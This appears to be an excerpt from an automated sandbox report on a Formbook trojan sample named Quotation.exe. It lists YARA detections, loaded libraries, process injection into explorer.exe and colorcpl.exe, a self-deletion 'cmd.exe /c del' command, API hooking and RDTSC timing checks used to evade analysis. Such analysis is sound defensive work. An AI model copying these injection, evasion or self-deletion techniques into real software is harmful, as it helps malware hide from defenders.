      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F16BD73_2_33F16BD7
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7FB803_2_33E7FB80
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1FB763_2_33F1FB76
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1AB403_2_33F1AB40
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0DAC63_2_33F0DAC6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EFDAAC3_2_33EFDAAC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EA5AA03_2_33EA5AA0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5EA803_2_33E5EA80
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED3A6C3_2_33ED3A6C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F17A463_2_33F17A46
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1FA493_2_33F1FA49
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E629A03_2_33E629A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F2A9A63_2_33F2A9A6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E769623_2_33E76962
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E699503_2_33E69950
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B9503_2_33E7B950
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E638E03_2_33E638E0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8E8F03_2_33E8E8F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E468B83_2_33E468B8
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E628403_2_33E62840
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6A8403_2_33E6A840
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECD8003_2_33ECD800
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6CFE03_2_33E6CFE0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E52FC83_2_33E52FC8
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1FFB13_2_33F1FFB1
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E61F923_2_33E61F92
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED4F403_2_33ED4F40
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EA2F283_2_33EA2F28
      Source: C:\Windows\explorer.exeCode function: 5_2_0B1412325_2_0B141232
      Source: C:\Windows\explorer.exeCode function: 5_2_0B13E9125_2_0B13E912
      Source: C:\Windows\explorer.exeCode function: 5_2_0B138D025_2_0B138D02
      Source: C:\Windows\explorer.exeCode function: 5_2_0B13BB325_2_0B13BB32
      Source: C:\Windows\explorer.exeCode function: 5_2_0B13BB305_2_0B13BB30
      Source: C:\Windows\explorer.exeCode function: 5_2_0B1445CD5_2_0B1445CD
      Source: C:\Windows\explorer.exeCode function: 5_2_0B1400365_2_0B140036
      Source: C:\Windows\explorer.exeCode function: 5_2_0B1370825_2_0B137082
      Source: C:\Windows\explorer.exeCode function: 5_2_10F230825_2_10F23082
      Source: C:\Windows\explorer.exeCode function: 5_2_10F2C0365_2_10F2C036
      Source: C:\Windows\explorer.exeCode function: 5_2_10F305CD5_2_10F305CD
      Source: C:\Windows\explorer.exeCode function: 5_2_10F2A9125_2_10F2A912
Source: C:\Windows\explorer.exe | Code function: 5_2_10F24D02
Source: C:\Windows\explorer.exe | Code function: 5_2_10F2D232
Source: C:\Windows\explorer.exe | Code function: 5_2_10F27B32
Source: C:\Windows\explorer.exe | Code function: 5_2_10F27B30
Source: C:\Users\user\Desktop\Quotation.exe | Code function: String function: 33EDF290 appears 66 times
Source: C:\Users\user\Desktop\Quotation.exe | Code function: String function: 33EA7E54 appears 76 times
Source: C:\Users\user\Desktop\Quotation.exe | Code function: String function: 33E4B970 appears 196 times
Source: C:\Users\user\Desktop\Quotation.exe | Code function: String function: 33ECEA12 appears 65 times
Source: Quotation.exe | Static PE information: invalid certificate
Source: Quotation.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: Quotation.exe, 00000003.00000003.2515303655.0000000033BE4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
Source: Quotation.exe, 00000003.00000002.2614695348.0000000033C73000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamecolorcpl.exej% vs Quotation.exe
Source: Quotation.exe, 00000003.00000003.2566857744.0000000003E45000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamecolorcpl.exej% vs Quotation.exe
Source: Quotation.exe, 00000003.00000003.2517704817.0000000033D9D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
Source: Quotation.exe, 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
Source: Quotation.exe, 00000003.00000003.2567063480.0000000003E59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamecolorcpl.exej% vs Quotation.exe
Source: Quotation.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Quotation.exe PID: 3288, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 2284, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/9@2/1
Source: C:\Users\user\Desktop\Quotation.exe | Code function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Quotation.exe | Code function: 0_2_00404991 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\Desktop\Quotation.exe | Code function: 0_2_004021AF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk
Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\ethnocentrism
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Temp\nsy2838.tmp
Source: Quotation.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Quotation.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Quotation.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Quotation.exe | Virustotal: Detection: 16%
Source: C:\Users\user\Desktop\Quotation.exe | File read: C:\Users\user\Desktop\Quotation.exe
Source: unknown | Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
Source: C:\Users\user\Desktop\Quotation.exe | Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Quotation.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: fontext.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: fms.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: xmllite.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: msxml3.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Quotation.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: colorui.dll
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: mscms.dll
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: coloradapterclient.dll
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Quotation.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Quotation.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: colorcpl.pdbGCTL source: Quotation.exe, 00000003.00000003.2566857744.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2566913391.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580408016.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614695348.0000000033C70000.00000040.10000000.00040000.00000000.sdmp, Quotation.exe, 00000003.00000003.2567063480.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3257653081.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: colorcpl.pdb source: Quotation.exe, 00000003.00000003.2566857744.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2566913391.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580408016.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614695348.0000000033C70000.00000040.10000000.00040000.00000000.sdmp, Quotation.exe, 00000003.00000003.2567063480.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3257653081.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2515303655.0000000033AC1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2517704817.0000000033C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2570205153.0000000004A69000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2567985473.00000000048BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Quotation.exe, Quotation.exe, 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2515303655.0000000033AC1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2517704817.0000000033C70000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2570205153.0000000004A69000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3258240253.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2567985473.00000000048BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmp

      Data Obfuscation

Source: Yara match | File source: 00000000.00000002.2396223937.0000000006CC9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Quotation.exe | Code function: 0_2_73421BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
Source: C:\Users\user\Desktop\Quotation.exe | Code function: 0_2_734230C0 push eax; ret 0_2_734230EE
Source: C:\Users\user\Desktop\Quotation.exe | Code function: 3_2_33E509AD push ecx; mov dword ptr [esp], ecx 3_2_33E509B6
Source: C:\Windows\explorer.exe | Code function: 5_2_0B144B1E push esp; retn 0000h 5_2_0B144B1F
Source: C:\Windows\explorer.exe | Code function: 5_2_0B144B02 push esp; retn 0000h 5_2_0B144B03
Source: C:\Windows\explorer.exe | Code function: 5_2_0B1449B5 push esp; retn 0000h 5_2_0B144AE7
Source: C:\Windows\explorer.exe | Code function: 5_2_10F309B5 push esp; retn 0000h 5_2_10F30AE7
Source: C:\Windows\explorer.exe | Code function: 5_2_10F30B1E push esp; retn 0000h 5_2_10F30B1F
Source: C:\Windows\explorer.exe | Code function: 5_2_10F30B02 push esp; retn 0000h 5_2_10F30B03
Source: C:\Users\user\Desktop\Quotation.exe | File created: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll

      Hooking and other Techniques for Hiding and Protection

Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xEA
Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Quotation.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 75C022C
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 352022C
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
      Source: C:\Users\user\Desktop\Quotation.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
      Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
      Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 7572A4F second address: 7572A4F instructions: 0x00000000 rdtsc 0x00000002 cmp ax, 00009D51h 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F0431126F2Fh 0x0000000a test bh, 00000067h 0x0000000d inc ebp 0x0000000e cmp dh, ch 0x00000010 inc ebx 0x00000011 test ebx, ecx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 34D2A4F second address: 34D2A4F instructions: 0x00000000 rdtsc 0x00000002 cmp ax, 00009D51h 0x00000006 cmp ebx, ecx 0x00000008 jc 00007F04310E472Fh 0x0000000a test bh, 00000067h 0x0000000d inc ebp 0x0000000e cmp dh, ch 0x00000010 inc ebx 0x00000011 test ebx, ecx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Quotation.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: AC9904 second address: AC990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
